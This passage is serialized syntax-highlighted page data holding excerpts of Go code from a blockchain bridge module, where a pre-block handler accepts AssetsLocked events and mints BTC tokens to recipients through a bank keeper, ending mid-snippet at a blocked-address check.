...\n}\n",[85647],{"type":25,"tag":82,"props":85648,"children":85649},{"__ignoreMap":7},[85650,85703,85718,85741,85771,85807,85815,85871,85895,85945,85952,85959,85966,85973,85980,86011,86034,86059,86074,86081,86118,86172,86195,86236,86243,86250,86301,86362,86385,86408,86420,86441,86453,86461,86468,86483,86491,86498,86505,86512,86519,86526,86557,86580,86605,86630,86645,86652,86689,86700,86721,86732,86744,86751,86774,86814,86821,86828],{"type":25,"tag":216,"props":85651,"children":85652},{"class":6922,"line":6923},[85653,85657,85661,85666,85670,85675,85679,85683,85687,85691,85695,85699],{"type":25,"tag":216,"props":85654,"children":85655},{"style":6936},[85656],{"type":31,"value":80272},{"type":25,"tag":216,"props":85658,"children":85659},{"style":6964},[85660],{"type":31,"value":7016},{"type":25,"tag":216,"props":85662,"children":85663},{"style":6947},[85664],{"type":31,"value":85665},"pbh ",{"type":25,"tag":216,"props":85667,"children":85668},{"style":6953},[85669],{"type":31,"value":8519},{"type":25,"tag":216,"props":85671,"children":85672},{"style":7375},[85673],{"type":31,"value":85674},"PreBlockHandler",{"type":25,"tag":216,"props":85676,"children":85677},{"style":6964},[85678],{"type":31,"value":7036},{"type":25,"tag":216,"props":85680,"children":85681},{"style":7047},[85682],{"type":31,"value":85375},{"type":25,"tag":216,"props":85684,"children":85685},{"style":6964},[85686],{"type":31,"value":18000},{"type":25,"tag":216,"props":85688,"children":85689},{"style":7375},[85690],{"type":31,"value":82702},{"type":25,"tag":216,"props":85692,"children":85693},{"style":6964},[85694],{"type":31,"value":179},{"type":25,"tag":216,"props":85696,"children":85697},{"style":7375},[85698],{"type":31,"value":85375},{"type":25,"tag":216,"props":85700,"children":85701},{"style":6964},[85702],{"type":31,"value":7241},{"type":25,"tag":216,"props":85704,"children":85705},{"class":6922,"line":6769},[85706,85710,85714],{"type":25,"tag":216,"props":85707,"children":85708},{"style":6973},[85709],{"type":31,"value":20947},{"type":25,"tag":216,"props":85711,"children":85712},{"style":6936},[85713],{"type":31,"value":83981},{"type":25,"tag":216,"props":85715,"children":85716},{"style":6964},[85717],{"type":31,"value":7420},{"type":25,"tag":216,"props":85719,"children":85720},{"class":6922,"line":6778},[85721,85725,85729,85733,85737],{"type":25,"tag":216,"props":85722,"children":85723},{"style":6947},[85724],{"type":31,"value":30144},{"type":25,"tag":216,"props":85726,"children":85727},{"style":7375},[85728],{"type":31,"value":82613},{"type":25,"tag":216,"props":85730,"children":85731},{"style":6964},[85732],{"type":31,"value":179},{"type":25,"tag":216,"props":85734,"children":85735},{"style":7375},[85736],{"type":31,"value":80321},{"type":25,"tag":216,"props":85738,"children":85739},{"style":6964},[85740],{"type":31,"value":7465},{"type":25,"tag":216,"props":85742,"children":85743},{"class":6922,"line":7005},[85744,85749,85753,85758,85762,85767],{"type":25,"tag":216,"props":85745,"children":85746},{"style":6947},[85747],{"type":31,"value":85748},"        req",{"type":25,"tag":216,"props":85750,"children":85751},{"style":6953},[85752],{"type":31,"value":13773},{"type":25,"tag":216,"props":85754,"children":85755},{"style":7375},[85756],{"type":31,"value":85757},"cmtabci",{"type":25,"tag":216,"props":85759,"children":85760},{"style":6964},[85761],{"type":31,"value":179},{"type":25,"tag":216,"props":85763,"children":85764},{"style":7375},[85765],{"type":31,"value":85766},"RequestFinalizeBlock",{"type":25,"tag":216,"props":85768,"children":85769},{"style":6964},[85770],{"type":31,"value":7465},{"type":25,"tag":216,"props":85772,"children":85773},{"class":6922,"line":7110},[85774,85778,85782,85786,85790,85795,85799,85803],{"type":25,"tag":216,"props":85775,"children":85776},{"style":6964},[85777],{"type":31,"value":84049},{"type":25,"tag":216,"props":85779,"children":85780},{"style":6953},[85781],{"type":31,"value":8519},{"type":25,"tag":216,"props":85783,"children":85784},{"style":7375},[85785],{"type":31,"value":82702},{"type":25,"tag":216,"props":85787,"children":85788},{"style":6964},[85789],{"type":31,"value":179},{"type":25,"tag":216,"props":85791,"children":85792},{"style":7375},[85793],{"type":31,"value":85794},"ResponsePreBlock",{"type":25,"tag":216,"props":85796,"children":85797},{"style":6964},[85798],{"type":31,"value":7026},{"type":25,"tag":216,"props":85800,"children":85801},{"style":7375},[85802],{"type":31,"value":18821},{"type":25,"tag":216,"props":85804,"children":85805},{"style":6964},[85806],{"type":31,"value":18761},{"type":25,"tag":216,"props":85808,"children":85809},{"class":6922,"line":7216},[85810],{"type":25,"tag":216,"props":85811,"children":85812},{"style":6953},[85813],{"type":31,"value":85814},"        ...\n",{"type":25,"tag":216,"props":85816,"children":85817},{"class":6922,"line":7244},[85818,85823,85827,85832,85836,85841,85845,85850,85854,85858,85862,85867],{"type":25,"tag":216,"props":85819,"children":85820},{"style":6947},[85821],{"type":31,"value":85822},"        err",{"type":25,"tag":216,"props":85824,"children":85825},{"style":6953},[85826],{"type":31,"value":80388},{"type":25,"tag":216,"props":85828,"children":85829},{"style":6947},[85830],{"type":31,"value":85831}," pbh",{"type":25,"tag":216,"props":85833,"children":85834},{"style":6964},[85835],{"type":31,"value":179},{"type":25,"tag":216,"props":85837,"children":85838},{"style":6947},[85839],{"type":31,"value":85840},"bridgeKeeper",{"type":25,"tag":216,"props":85842,"children":85843},{"style":6964},[85844],{"type":31,"value":179},{"type":25,"tag":216,"props":85846,"children":85847},{"style":7047},[85848],{"type":31,"value":85849},"AcceptAssetsLocked",{"type":25,"tag":216,"props":85851,"children":85852},{"style":6964},[85853],{"type":31,"value":1850},{"type":25,"tag":216,"props":85855,"children":85856},{"style":6947},[85857],{"type":31,"value":24240},{"type":25,"tag":216,"props":85859,"children":85860},{"style":6964},[85861],{"type":31,"value":7026},{"type":25,"tag":216,"props":85863,"children":85864},{"style":6947},[85865],{"type":31,"value":85866},"events",{"type":25,"tag":216,"props":85868,"children":85869},{"style":6964},[85870],{"type":31,"value":7107},{"type":25,"tag":216,"props":85872,"children":85873},{"class":6922,"line":7257},[85874,85878,85882,85886,85891],{"type":25,"tag":216,"props":85875,"children":85876},{"style":6973},[85877],{"type":31,"value":7222},{"type":25,"tag":216,"props":85879,"children":85880},{"style":6947},[85881],{"type":31,"value":52490},{"type":25,"tag":216,"props":85883,"children":85884},{"style":6953},[85885],{"type":31,"value":68355},{"type":25,"tag":216,"props":85887,"children":85888},{"style":6936},[85889],{"type":31,"value":85890}," nil",{"type":25,"tag":216,"props":85892,"children":85893},{"style":6964},[85894],{"type":31,"value":7241},{"type":25,"tag":216,"props":85896,"children":85897},{"class":6922,"line":7275},[85898,85902,85906,85910,85915,85919,85924,85928,85933,85937,85941],{"type":25,"tag":216,"props":85899,"children":85900},{"style":6973},[85901],{"type":31,"value":83048},{"type":25,"tag":216,"props":85903,"children":85904},{"style":6936},[85905],{"type":31,"value":85890},{"type":25,"tag":216,"props":85907,"children":85908},{"style":6964},[85909],{"type":31,"value":7026},{"type":25,"tag":216,"props":85911,"children":85912},{"style":6947},[85913],{"type":31,"value":85914},"fmt",{"type":25,"tag":216,"props":85916,"children":85917},{"style":6964},[85918],{"type":31,"value":179},{"type":25,"tag":216,"props":85920,"children":85921},{"style":7047},[85922],{"type":31,"value":85923},"Errorf",{"type":25,"tag":216,"props":85925,"children":85926},{"style":6964},[85927],{"type":31,"value":1850},{"type":25,"tag":216,"props":85929,"children":85930},{"style":8205},[85931],{"type":31,"value":85932},"\"cannot accept AssetsLocked events: %w\"",{"type":25,"tag":216,"props":85934,"children":85935},{"style":6964},[85936],{"type":31,"value":7026},{"type":25,"tag":216,"props":85938,"children":85939},{"style":6947},[85940],{"type":31,"value":52389},{"type":25,"tag":216,"props":85942,"children":85943},{"style":6964},[85944],{"type":31,"value":7107},{"type":25,"tag":216,"props":85946,"children":85947},{"class":6922,"line":7296},[85948],{"type":25,"tag":216,"props":85949,"children":85950},{"style":6964},[85951],{"type":31,"value":7302},{"type":25,"tag":216,"props":85953,"children":85954},{"class":6922,"line":7305},[85955],{"type":25,"tag":216,"props":85956,"children":85957},{"style":6953},[85958],{"type":31,"value":85814},{"type":25,"tag":216,"props":85960,"children":85961},{"class":6922,"line":7557},[85962],{"type":25,"tag":216,"props":85963,"children":85964},{"style":6964},[85965],{"type":31,"value":7311},{"type":25,"tag":216,"props":85967,"children":85968},{"class":6922,"line":7574},[85969],{"type":25,"tag":216,"props":85970,"children":85971},{"style":6964},[85972],{"type":31,"value":7874},{"type":25,"tag":216,"props":85974,"children":85975},{"class":6922,"line":7591},[85976],{"type":25,"tag":216,"props":85977,"children":85978},{"emptyLinePlaceholder":16},[85979],{"type":31,"value":7642},{"type":25,"tag":216,"props":85981,"children":85982},{"class":6922,"line":7604},[85983,85987,85991,85995,85999,86003,86007],{"type":25,"tag":216,"props":85984,"children":85985},{"style":6936},[85986],{"type":31,"value":80272},{"type":25,"tag":216,"props":85988,"children":85989},{"style":6964},[85990],{"type":31,"value":7016},{"type":25,"tag":216,"props":85992,"children":85993},{"style":6947},[85994],{"type":31,"value":85100},{"type":25,"tag":216,"props":85996,"children":85997},{"style":7375},[85998],{"type":31,"value":83917},{"type":25,"tag":216,"props":86000,"children":86001},{"style":6964},[86002],{"type":31,"value":7036},{"type":25,"tag":216,"props":86004,"children":86005},{"style":7047},[86006],{"type":31,"value":85849},{"type":25,"tag":216,"props":86008,"children":86009},{"style":6964},[86010],{"type":31,"value":7420},{"type":25,"tag":216,"props":86012,"children":86013},{"class":6922,"line":7613},[86014,86018,86022,86026,86030],{"type":25,"tag":216,"props":86015,"children":86016},{"style":6947},[86017],{"type":31,"value":24183},{"type":25,"tag":216,"props":86019,"children":86020},{"style":7375},[86021],{"type":31,"value":82613},{"type":25,"tag":216,"props":86023,"children":86024},{"style":6964},[86025],{"type":31,"value":179},{"type":25,"tag":216,"props":86027,"children":86028},{"style":7375},[86029],{"type":31,"value":80321},{"type":25,"tag":216,"props":86031,"children":86032},{"style":6964},[86033],{"type":31,"value":7465},{"type":25,"tag":216,"props":86035,"children":86036},{"class":6922,"line":7636},[86037,86042,86046,86050,86055],{"type":25,"tag":216,"props":86038,"children":86039},{"style":6947},[86040],{"type":31,"value":86041},"    events",{"type":25,"tag":216,"props":86043,"children":86044},{"style":7375},[86045],{"type":31,"value":82147},{"type":25,"tag":216,"props":86047,"children":86048},{"style":6964},[86049],{"type":31,"value":179},{"type":25,"tag":216,"props":86051,"children":86052},{"style":7375},[86053],{"type":31,"value":86054},"AssetsLockedEvents",{"type":25,"tag":216,"props":86056,"children":86057},{"style":6964},[86058],{"type":31,"value":7465},{"type":25,"tag":216,"props":86060,"children":86061},{"class":6922,"line":7645},[86062,86066,86070],{"type":25,"tag":216,"props":86063,"children":86064},{"style":6964},[86065],{"type":31,"value":7036},{"type":25,"tag":216,"props":86067,"children":86068},{"style":7375},[86069],{"type":31,"value":18821},{"type":25,"tag":216,"props":86071,"children":86072},{"style":6964},[86073],{"type":31,"value":7241},{"type":25,"tag":216,"props":86075,"children":86076},{"class":6922,"line":7654},[86077],{"type":25,"tag":216,"props":86078,"children":86079},{"style":6953},[86080],{"type":31,"value":24299},{"type":25,"tag":216,"props":86082,"children":86083},{"class":6922,"line":7722},[86084,86088,86092,86096,86101,86105,86109,86114],{"type":25,"tag":216,"props":86085,"children":86086},{"style":6973},[86087],{"type":31,"value":6976},{"type":25,"tag":216,"props":86089,"children":86090},{"style":6947},[86091],{"type":31,"value":6981},{"type":25,"tag":216,"props":86093,"children":86094},{"style":6964},[86095],{"type":31,"value":7026},{"type":25,"tag":216,"props":86097,"children":86098},{"style":6947},[86099],{"type":31,"value":86100},"event",{"type":25,"tag":216,"props":86102,"children":86103},{"style":6953},[86104],{"type":31,"value":80388},{"type":25,"tag":216,"props":86106,"children":86107},{"style":6973},[86108],{"type":31,"value":81371},{"type":25,"tag":216,"props":86110,"children":86111},{"style":6947},[86112],{"type":31,"value":86113}," events",{"type":25,"tag":216,"props":86115,"children":86116},{"style":6964},[86117],{"type":31,"value":7241},{"type":25,"tag":216,"props":86119,"children":86120},{"class":6922,"line":7730},[86121,86126,86130,86134,86138,86142,86146,86151,86155,86159,86163,86168],{"type":25,"tag":216,"props":86122,"children":86123},{"style":6947},[86124],{"type":31,"value":86125},"        recipient",{"type":25,"tag":216,"props":86127,"children":86128},{"style":6964},[86129],{"type":31,"value":7026},{"type":25,"tag":216,"props":86131,"children":86132},{"style":6947},[86133],{"type":31,"value":52389},{"type":25,"tag":216,"props":86135,"children":86136},{"style":6953},[86137],{"type":31,"value":80388},{"type":25,"tag":216,"props":86139,"children":86140},{"style":6947},[86141],{"type":31,"value":82613},{"type":25,"tag":216,"props":86143,"children":86144},{"style":6964},[86145],{"type":31,"value":179},{"type":25,"tag":216,"props":86147,"children":86148},{"style":7047},[86149],{"type":31,"value":86150},"AccAddressFromBech32",{"type":25,"tag":216,"props":86152,"children":86153},{"style":6964},[86154],{"type":31,"value":1850},{"type":25,"tag":216,"props":86156,"children":86157},{"style":6947},[86158],{"type":31,"value":86100},{"type":25,"tag":216,"props":86160,"children":86161},{"style":6964},[86162],{"type":31,"value":179},{"type":25,"tag":216,"props":86164,"children":86165},{"style":6947},[86166],{"type":31,"value":86167},"Recipient",{"type":25,"tag":216,"props":86169,"children":86170},{"style":6964},[86171],{"type":31,"value":7107},{"type":25,"tag":216,"props":86173,"children":86174},{"class":6922,"line":7760},[86175,86179,86183,86187,86191],{"type":25,"tag":216,"props":86176,"children":86177},{"style":6973},[86178],{"type":31,"value":7222},{"type":25,"tag":216,"props":86180,"children":86181},{"style":6947},[86182],{"type":31,"value":52490},{"type":25,"tag":216,"props":86184,"children":86185},{"style":6953},[86186],{"type":31,"value":68355},{"type":25,"tag":216,"props":86188,"children":86189},{"style":6936},[86190],{"type":31,"value":85890},{"type":25,"tag":216,"props":86192,"children":86193},{"style":6964},[86194],{"type":31,"value":7241},{"type":25,"tag":216,"props":86196,"children":86197},{"class":6922,"line":7768},[86198,86202,86207,86211,86215,86219,86224,86228,86232],{"type":25,"tag":216,"props":86199,"children":86200},{"style":6973},[86201],{"type":31,"value":83048},{"type":25,"tag":216,"props":86203,"children":86204},{"style":6947},[86205],{"type":31,"value":86206}," fmt",{"type":25,"tag":216,"props":86208,"children":86209},{"style":6964},[86210],{"type":31,"value":179},{"type":25,"tag":216,"props":86212,"children":86213},{"style":7047},[86214],{"type":31,"value":85923},{"type":25,"tag":216,"props":86216,"children":86217},{"style":6964},[86218],{"type":31,"value":1850},{"type":25,"tag":216,"props":86220,"children":86221},{"style":8205},[86222],{"type":31,"value":86223},"\"failed to parse recipient address: %w\"",{"type":25,"tag":216,"props":86225,"children":86226},{"style":6964},[86227],{"type":31,"value":7026},{"type":25,"tag":216,"props":86229,"children":86230},{"style":6947},[86231],{"type":31,"value":52389},{"type":25,"tag":216,"props":86233,"children":86234},{"style":6964},[86235],{"type":31,"value":7107},{"type":25,"tag":216,"props":86237,"children":86238},{"class":6922,"line":7800},[86239],{"type":25,"tag":216,"props":86240,"children":86241},{"style":6964},[86242],{"type":31,"value":7302},{"type":25,"tag":216,"props":86244,"children":86245},{"class":6922,"line":7808},[86246],{"type":25,"tag":216,"props":86247,"children":86248},{"emptyLinePlaceholder":16},[86249],{"type":31,"value":7642},{"type":25,"tag":216,"props":86251,"children":86252},{"class":6922,"line":7868},[86253,86257,86262,86266,86271,86275,86279,86283,86288,86292,86297],{"type":25,"tag":216,"props":86254,"children":86255},{"style":6973},[86256],{"type":31,"value":7222},{"type":25,"tag":216,"props":86258,"children":86259},{"style":6947},[86260],{"type":31,"value":86261}," bytes",{"type":25,"tag":216,"props":86263,"children":86264},{"style":6964},[86265],{"type":31,"value":179},{"type":25,"tag":216,"props":86267,"children":86268},{"style":7047},[86269],{"type":31,"value":86270},"Equal",{"type":25,"tag":216,"props":86272,"children":86273},{"style":6964},[86274],{"type":31,"value":1850},{"type":25,"tag":216,"props":86276,"children":86277},{"style":6947},[86278],{"type":31,"value":86100},{"type":25,"tag":216,"props":86280,"children":86281},{"style":6964},[86282],{"type":31,"value":179},{"type":25,"tag":216,"props":86284,"children":86285},{"style":7047},[86286],{"type":31,"value":86287},"TokenBytes",{"type":25,"tag":216,"props":86289,"children":86290},{"style":6964},[86291],{"type":31,"value":22334},{"type":25,"tag":216,"props":86293,"children":86294},{"style":6947},[86295],{"type":31,"value":86296},"sourceBTCToken",{"type":25,"tag":216,"props":86298,"children":86299},{"style":6964},[86300],{"type":31,"value":18761},{"type":25,"tag":216,"props":86302,"children":86303},{"class":6922,"line":13001},[86304,86309,86313,86317,86321,86326,86330,86334,86338,86342,86346,86350,86354,86358],{"type":25,"tag":216,"props":86305,"children":86306},{"style":6947},[86307],{"type":31,"value":86308},"            err",{"type":25,"tag":216,"props":86310,"children":86311},{"style":6953},[86312],{"type":31,"value":6956},{"type":25,"tag":216,"props":86314,"children":86315},{"style":6947},[86316],{"type":31,"value":85228},{"type":25,"tag":216,"props":86318,"children":86319},{"style":6964},[86320],{"type":31,"value":179},{"type":25,"tag":216,"props":86322,"children":86323},{"style":7047},[86324],{"type":31,"value":86325},"mintBTC",{"type":25,"tag":216,"props":86327,"children":86328},{"style":6964},[86329],{"type":31,"value":1850},{"type":25,"tag":216,"props":86331,"children":86332},{"style":6947},[86333],{"type":31,"value":24240},{"type":25,"tag":216,"props":86335,"children":86336},{"style":6964},[86337],{"type":31,"value":7026},{"type":25,"tag":216,"props":86339,"children":86340},{"style":6947},[86341],{"type":31,"value":85623},{"type":25,"tag":216,"props":86343,"children":86344},{"style":6964},[86345],{"type":31,"value":7026},{"type":25,"tag":216,"props":86347,"children":86348},{"style":6947},[86349],{"type":31,"value":86100},{"type":25,"tag":216,"props":86351,"children":86352},{"style":6964},[86353],{"type":31,"value":179},{"type":25,"tag":216,"props":86355,"children":86356},{"style":6947},[86357],{"type":31,"value":83027},{"type":25,"tag":216,"props":86359,"children":86360},{"style":6964},[86361],{"type":31,"value":7107},{"type":25,"tag":216,"props":86363,"children":86364},{"class":6922,"line":13019},[86365,86369,86373,86377,86381],{"type":25,"tag":216,"props":86366,"children":86367},{"style":6973},[86368],{"type":31,"value":62768},{"type":25,"tag":216,"props":86370,"children":86371},{"style":6947},[86372],{"type":31,"value":52490},{"type":25,"tag":216,"props":86374,"children":86375},{"style":6953},[86376],{"type":31,"value":68355},{"type":25,"tag":216,"props":86378,"children":86379},{"style":6936},[86380],{"type":31,"value":85890},{"type":25,"tag":216,"props":86382,"children":86383},{"style":6964},[86384],{"type":31,"value":7241},{"type":25,"tag":216,"props":86386,"children":86387},{"class":6922,"line":13064},[86388,86392,86396,86400,86404],{"type":25,"tag":216,"props":86389,"children":86390},{"style":6973},[86391],{"type":31,"value":64696},{"type":25,"tag":216,"props":86393,"children":86394},{"style":6947},[86395],{"type":31,"value":86206},{"type":25,"tag":216,"props":86397,"children":86398},{"style":6964},[86399],{"type":31,"value":179},{"type":25,"tag":216,"props":86401,"children":86402},{"style":7047},[86403],{"type":31,"value":85923},{"type":25,"tag":216,"props":86405,"children":86406},{"style":6964},[86407],{"type":31,"value":7420},{"type":25,"tag":216,"props":86409,"children":86410},{"class":6922,"line":13170},[86411,86416],{"type":25,"tag":216,"props":86412,"children":86413},{"style":8205},[86414],{"type":31,"value":86415},"                    \"failed to mint BTC for event %v: %w\"",{"type":25,"tag":216,"props":86417,"children":86418},{"style":6964},[86419],{"type":31,"value":7465},{"type":25,"tag":216,"props":86421,"children":86422},{"class":6922,"line":27455},[86423,86428,86432,86437],{"type":25,"tag":216,"props":86424,"children":86425},{"style":6947},[86426],{"type":31,"value":86427},"                    event",{"type":25,"tag":216,"props":86429,"children":86430},{"style":6964},[86431],{"type":31,"value":179},{"type":25,"tag":216,"props":86433,"children":86434},{"style":6947},[86435],{"type":31,"value":86436},"Sequence",{"type":25,"tag":216,"props":86438,"children":86439},{"style":6964},[86440],{"type":31,"value":7465},{"type":25,"tag":216,"props":86442,"children":86443},{"class":6922,"line":27490},[86444,86449],{"type":25,"tag":216,"props":86445,"children":86446},{"style":6947},[86447],{"type":31,"value":86448},"                    err",{"type":25,"tag":216,"props":86450,"children":86451},{"style":6964},[86452],{"type":31,"value":7465},{"type":25,"tag":216,"props":86454,"children":86455},{"class":6922,"line":27498},[86456],{"type":25,"tag":216,"props":86457,"children":86458},{"style":6964},[86459],{"type":31,"value":86460},"                )\n",{"type":25,"tag":216,"props":86462,"children":86463},{"class":6922,"line":27506},[86464],{"type":25,"tag":216,"props":86465,"children":86466},{"style":6964},[86467],{"type":31,"value":62852},{"type":25,"tag":216,"props":86469,"children":86470},{"class":6922,"line":27515},[86471,86475,86479],{"type":25,"tag":216,"props":86472,"children":86473},{"style":6964},[86474],{"type":31,"value":7263},{"type":25,"tag":216,"props":86476,"children":86477},{"style":6973},[86478],{"type":31,"value":7268},{"type":25,"tag":216,"props":86480,"children":86481},{"style":6964},[86482],{"type":31,"value":7241},{"type":25,"tag":216,"props":86484,"children":86485},{"class":6922,"line":27557},[86486],{"type":25,"tag":216,"props":86487,"children":86488},{"style":6953},[86489],{"type":31,"value":86490},"            ...\n",{"type":25,"tag":216,"props":86492,"children":86493},{"class":6922,"line":27590},[86494],{"type":25,"tag":216,"props":86495,"children":86496},{"style":6964},[86497],{"type":31,"value":7302},{"type":25,"tag":216,"props":86499,"children":86500},{"class":6922,"line":27598},[86501],{"type":25,"tag":216,"props":86502,"children":86503},{"style":6964},[86504],{"type":31,"value":7311},{"type":25,"tag":216,"props":86506,"children":86507},{"class":6922,"line":27606},[86508],{"type":25,"tag":216,"props":86509,"children":86510},{"style":6953},[86511],{"type":31,"value":24299},{"type":25,"tag":216,"props":86513,"children":86514},{"class":6922,"line":27615},[86515],{"type":25,"tag":216,"props":86516,"children":86517},{"style":6964},[86518],{"type":31,"value":7874},{"type":25,"tag":216,"props":86520,"children":86521},{"class":6922,"line":27691},[86522],{"type":25,"tag":216,"props":86523,"children":86524},{"emptyLinePlaceholder":16},[86525],{"type":31,"value":7642},{"type":25,"tag":216,"props":86527,"children":86528},{"class":6922,"line":27724},[86529,86533,86537,86541,86545,86549,86553],{"type":25,"tag":216,"props":86530,"children":86531},{"style":6936},[86532],{"type":31,"value":80272},{"type":25,"tag":216,"props":86534,"children":86535},{"style":6964},[86536],{"type":31,"value":7016},{"type":25,"tag":216,"props":86538,"children":86539},{"style":6947},[86540],{"type":31,"value":85100},{"type":25,"tag":216,"props":86542,"children":86543},{"style":7375},[86544],{"type":31,"value":83917},{"type":25,"tag":216,"props":86546,"children":86547},{"style":6964},[86548],{"type":31,"value":7036},{"type":25,"tag":216,"props":86550,"children":86551},{"style":7047},[86552],{"type":31,"value":86325},{"type":25,"tag":216,"props":86554,"children":86555},{"style":6964},[86556],{"type":31,"value":7420},{"type":25,"tag":216,"props":86558,"children":86559},{"class":6922,"line":27732},[86560,86564,86568,86572,86576],{"type":25,"tag":216,"props":86561,"children":86562},{"style":6947},[86563],{"type":31,"value":24183},{"type":25,"tag":216,"props":86565,"children":86566},{"style":7375},[86567],{"type":31,"value":82613},{"type":25,"tag":216,"props":86569,"children":86570},{"style":6964},[86571],{"type":31,"value":179},{"type":25,"tag":216,"props":86573,"children":86574},{"style":7375},[86575],{"type":31,"value":80321},{"type":25,"tag":216,"props":86577,"children":86578},{"style":6964},[86579],{"type":31,"value":7465},{"type":25,"tag":216,"props":86581,"children":86582},{"class":6922,"line":27740},[86583,86588,86592,86596,86601],{"type":25,"tag":216,"props":86584,"children":86585},{"style":6947},[86586],{"type":31,"value":86587},"    recipient",{"type":25,"tag":216,"props":86589,"children":86590},{"style":7375},[86591],{"type":31,"value":82613},{"type":25,"tag":216,"props":86593,"children":86594},{"style":6964},[86595],{"type":31,"value":179},{"type":25,"tag":216,"props":86597,"children":86598},{"style":7375},[86599],{"type":31,"value":86600},"AccAddress",{"type":25,"tag":216,"props":86602,"children":86603},{"style":6964},[86604],{"type":31,"value":7465},{"type":25,"tag":216,"props":86606,"children":86607},{"class":6922,"line":27777},[86608,86612,86617,86621,86626],{"type":25,"tag":216,"props":86609,"children":86610},{"style":6947},[86611],{"type":31,"value":65550},{"type":25,"tag":216,"props":86613,"children":86614},{"style":7375},[86615],{"type":31,"value":86616}," math",{"type":25,"tag":216,"props":86618,"children":86619},{"style":6964},[86620],{"type":31,"value":179},{"type":25,"tag":216,"props":86622,"children":86623},{"style":7375},[86624],{"type":31,"value":86625},"Int",{"type":25,"tag":216,"props":86627,"children":86628},{"style":6964},[86629],{"type":31,"value":7465},{"type":25,"tag":216,"props":86631,"children":86632},{"class":6922,"line":27790},[86633,86637,86641],{"type":25,"tag":216,"props":86634,"children":86635},{"style":6964},[86636],{"type":31,"value":7036},{"type":25,"tag":216,"props":86638,"children":86639},{"style":7375},[86640],{"type":31,"value":18821},{"type":25,"tag":216,"props":86642,"children":86643},{"style":6964},[86644],{"type":31,"value":7241},{"type":25,"tag":216,"props":86646,"children":86647},{"class":6922,"line":27803},[86648],{"type":25,"tag":216,"props":86649,"children":86650},{"style":6953},[86651],{"type":31,"value":24299},{"type":25,"tag":216,"props":86653,"children":86654},{"class":6922,"line":27816},[86655,86660,86664,86668,86672,86677,86681,86685],{"type":25,"tag":216,"props":86656,"children":86657},{"style":6947},[86658],{"type":31,"value":86659},"    err",{"type":25,"tag":216,"props":86661,"children":86662},{"style":6953},[86663],{"type":31,"value":6956},{"type":25,"tag":216,"props":86665,"children":86666},{"style":6947},[86667],{"type":31,"value":85228},{"type":25,"tag":216,"props":86669,"children":86670},{"style":6964},[86671],{"type":31,"value":179},{"type":25,"tag":216,"props":86673,"children":86674},{"style":6947},[86675],{"type":31,"value":86676},"bankKeeper",{"type":25,"tag":216,"props":86678,"children":86679},{"style":6964},[86680],{"type":31,"value":179},{"type":25,"tag":216,"props":86682,"children":86683},{"style":7047},[86684],{"type":31,"value":85615},{"type":25,"tag":216,"props":86686,"children":86687},{"style":6964},[86688],{"type":31,"value":7420},{"type":25,"tag":216,"props":86690,"children":86691},{"class":6922,"line":27870},[86692,86696],{"type":25,"tag":216,"props":86693,"children":86694},{"style":6947},[86695],{"type":31,"value":30144},{"type":25,"tag":216,"props":86697,"children":86698},{"style":6964},[86699],{"type":31,"value":7465},{"type":25,"tag":216,"props":86701,"children":86702},{"class":6922,"line":27879},[86703,86708,86712,86717],{"type":25,"tag":216,"props":86704,"children":86705},{"style":6947},[86706],{"type":31,"value":86707},"        types",{"type":25,"tag":216,"props":86709,"children":86710},{"style":6964},[86711],{"type":31,"value":179},{"type":25,"tag":216,"props":86713,"children":86714},{"style":6947},[86715],{"type":31,"value":86716},"ModuleName",{"type":25,"tag":216,"props":86718,"children":86719},{"style":6964},[86720],{"type":31,"value":7465},{"type":25,"tag":216,"props":86722,"children":86723},{"class":6922,"line":36243},[86724,86728],{"type":25,"tag":216,"props":86725,"children":86726},{"style":6947},[86727],{"type":31,"value":86125},{"type":25,"tag":216,"props":86729,"children":86730},{"style":6964},[86731],{"type":31,"value":7465},{"type":25,"tag":216,"props":86733,"children":86734},{"class":6922,"line":36264},[86735,86740],{"type":25,"tag":216,"props":86736,"children":86737},{"style":6947},[86738],{"type":31,"value":86739},"        coins",{"type":25,"tag":216,"props":86741,"children":86742},{"style":6964},[86743],{"type":31,"value":7465},{"type":25,"tag":216,"props":86745,"children":86746},{"class":6922,"line":84923},[86747],{"type":25,"tag":216,"props":86748,"children":86749},{"style":6964},[86750],{"type":31,"value":27876},{"type":25,"tag":216,"props":86752,"children":86753},{"class":6922,"line":84936},[86754,86758,86762,86766,86770],{"type":25,"tag":216,"props":86755,"children":86756},{"style":6973},[86757],{"type":31,"value":16235},{"type":25,"tag":216,"props":86759,"children":86760},{"style":6947},[86761],{"type":31,"value":52490},{"type":25,"tag":216,"props":86763,"children":86764},{"style":6953},[86765],{"type":31,"value":68355},{"type":25,"tag":216,"props":86767,"children":86768},{"style":6936},[86769],{"type":31,"value":85890},{"type":25,"tag":216,"props":86771,"children":86772},{"style":6964},[86773],{"type":31,"value":7241},{"type":25,"tag":216,"props":86775,"children":86776},{"class":6922,"line":84944},[86777,86781,86785,86789,86793,86797,86802,86806,86810],{"type":25,"tag":216,"props":86778,"children":86779},{"style":6973},[86780],{"type":31,"value":19702},{"type":25,"tag":216,"props":86782,"children":86783},{"style":6947},[86784],{"type":31,"value":86206},{"type":25,"tag":216,"props":86786,"children":86787},{"style":6964},[86788],{"type":31,"value":179},{"type":25,"tag":216,"props":86790,"children":86791},{"style":7047},[86792],{"type":31,"value":85923},{"type":25,"tag":216,"props":86794,"children":86795},{"style":6964},[86796],{"type":31,"value":1850},{"type":25,"tag":216,"props":86798,"children":86799},{"style":8205},[86800],{"type":31,"value":86801},"\"failed to send coins: %w\"",{"type":25,"tag":216,"props":86803,"children":86804},{"style":6964},[86805],{"type":31,"value":7026},{"type":25,"tag":216,"props":86807,"children":86808},{"style":6947},[86809],{"type":31,"value":52389},{"type":25,"tag":216,"props":86811,"children":86812},{"style":6964},[86813],{"type":31,"value":7107},{"type":25,"tag":216,"props":86815,"children":86816},{"class":6922,"line":84952},[86817],{"type":25,"tag":216,"props":86818,"children":86819},{"style":6964},[86820],{"type":31,"value":7311},{"type":25,"tag":216,"props":86822,"children":86823},{"class":6922,"line":84960},[86824],{"type":25,"tag":216,"props":86825,"children":86826},{"style":6953},[86827],{"type":31,"value":24299},{"type":25,"tag":216,"props":86829,"children":86830},{"class":6922,"line":85000},[86831],{"type":25,"tag":216,"props":86832,"children":86833},{"style":6964},[86834],{"type":31,"value":7874},{"type":25,"tag":206,"props":86836,"children":86838},{"code":86837,"language":80136,"meta":7,"className":80137,"style":7},"func (k BaseKeeper) SendCoinsFromModuleToAccount(\n ctx context.Context, senderModule string, recipientAddr sdk.AccAddress, amt sdk.Coins,\n) error {\n ...\n if k.BlockedAddr(recipientAddr) {\n  return 